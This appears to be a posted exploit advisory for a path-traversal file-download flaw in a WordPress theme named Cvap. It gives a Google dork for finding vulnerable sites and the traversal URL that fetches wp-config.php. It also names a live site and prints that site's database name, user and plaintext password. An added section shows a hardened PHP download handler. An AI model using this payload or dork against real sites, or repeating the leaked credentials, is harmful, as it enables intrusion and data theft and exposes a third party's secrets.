KingSkrupellos

WordPress 4.3.1 Cvap Themes Canada Arbitrary File Download

Mar 18th, 2019
############################################################################################

# Exploit Title : WordPress 4.3.1 Cvap Themes Canada Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepage : cvap.quebec - unikmedia.ca
# Software Information Link : unikmedia.ca/services-creation-site-web-quebec/creation-site-web/
# Software Affected Version : 4.3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:"/wp-content/themes/cvap/" intext:© CVAP 2015 - Création site web Québec Unik Media
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
* WordPress 4.3.1 Cvap Canada Themes is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive information.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
* The software has a Relative Path Traversal vulnerability: it uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

############################################################################################

# Vulnerable File :
****************
/downloadfile.php

# Vulnerable Parameter :
***********************
?file=

# Arbitrary File Download Exploit :
*******************************
/wp-content/themes/cvap/downloadfile.php?file=[FILENAME]

/wp-content/themes/cvap/downloadfile.php?file=../../../wp-config.php

# Information about MySQL Configuration File :
******************************************
/** Name of the WordPress database. */
define('DB_NAME', '');

/** MySQL database user. */
define('DB_USER', '');

/** MySQL database password. */
define('DB_PASSWORD', '');

/** MySQL host address. */
define('DB_HOST', '');

############################################################################################

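A hardened form of the download handler, as an added example (not the theme's code, whose source is not shown on this page). It assumes the downloadable files live in a "downloads" directory beside the script and that only the listed extensions are meant to be public; resolve_download, the directory name and the allowlist are hypothetical.

```php
<?php
// Added example, not the theme's own code. Assumptions: served files live in
// ./downloads beside this script, and only the extensions below are public.

/** Map a user-supplied name to a canonical path inside $baseDir, or null. */
function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; false if nothing is there.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment: canonical path must begin with "<base>/". The trailing
    // separator stops a sibling such as "downloads-old" from matching.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Extension allowlist (assumed): source files such as .php are never served.
    $allowed = ['pdf', 'doc', 'docx', 'jpg', 'png'];
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true) ? $target : null;
}

$raw  = $_GET['file'] ?? '';
$path = is_string($raw) ? resolve_download(__DIR__ . '/downloads', $raw) : null;
if ($path === null) {
    http_response_code(404);   // same answer for "missing" and "not allowed"
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="'
    . str_replace('"', '', basename($path)) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this check, a request for file=../../../wp-config.php canonicalizes to a path outside the base directory and receives a 404; the extension allowlist would refuse it as well.
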
# Example Vulnerable Sites :
*************************
[+] cvap.quebec/wp-content/themes/cvap/downloadfile.php?file=../../../wp-config.php

/** Name of the WordPress database. */
define('DB_NAME', 'cvap_wpdatabase');

/** MySQL database user. */
define('DB_USER', 'cvap_wpbduser');

/** MySQL database password. */
define('DB_PASSWORD', 'FZc3anVHs6sWfRo');

/** MySQL host address. */
define('DB_HOST', 'localhost');

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################